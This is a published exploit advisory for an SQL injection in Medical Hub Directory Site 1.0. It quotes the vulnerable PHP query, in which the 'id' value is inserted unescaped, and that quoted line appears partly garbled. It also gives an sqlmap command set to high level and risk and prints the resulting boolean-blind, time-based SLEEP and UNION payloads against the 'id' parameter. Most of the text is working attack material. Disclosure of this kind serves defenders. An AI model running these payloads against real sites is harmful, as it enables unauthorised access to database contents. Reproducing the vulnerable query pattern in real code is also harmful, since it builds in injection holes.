Medical Hub Directory Site 1.0 SQL Injection

Medical Hub Directory Site version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | 68f79cd32fc1bd7a43a091c2c0b85919

# Exploit Title: Medical Hub Directory Site - 'id' SQL Injection
# Date: 30/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: XAMPP, Linux

# Vulnerable Code

line 9 in file "/mhds/clinic/view_details.php"

$categories = $conn->query("SELECT c.category_id, as category FROM clinic_category c inner join category_list cc on c.category_id = where c.clinic_id = '{$id}' ")->fetch_all(MYSQLI_ASSOC);

# Sqlmap command:

sqlmap -u 'http://localhost/mhds/?page=clinic/view_details&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta

# Output:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=clinic/view_details&id=1' AND 8622=8622-- pBEY

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=clinic/view_details&id=1' AND (SELECT 9741 FROM (SELECT(SLEEP(5)))AmHc)-- Gwec

Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: page=clinic/view_details&id=-4315' UNION ALL SELECT CONCAT(0x71717a7071,0x4d5246716246517044556c4d4a584f5853646d526a6957666463567a514f73504745636759635454,0x71786a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Related Posts